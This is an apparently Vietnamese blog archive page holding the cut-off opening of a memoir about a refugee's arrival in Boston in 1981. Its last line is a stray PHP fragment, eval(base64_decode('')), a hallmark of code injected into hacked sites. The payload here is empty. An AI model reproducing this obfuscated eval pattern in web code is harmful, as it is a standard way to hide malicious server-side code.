Archive for February 6th, 2016

Đêm giao thừa đầu tiên trên đất Mỹ

Đêm giao thừa đầu tiên trên đất Mỹ

Tôi xuống máy bay ở phi trường Logan, Boston khoảng 10 giờ tối, một ngày cuối tháng 11, 1981 trong cái lạnh se người. Tôi và T., một người tỵ nạn cùng chuyến và nhỏ hơn tôi vài tuổi, nhìn quanh không thấy ai. Chờ khoảng mười phút, chúng t

02.6.2016 | Ký-Truyện-Tùy Bút |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>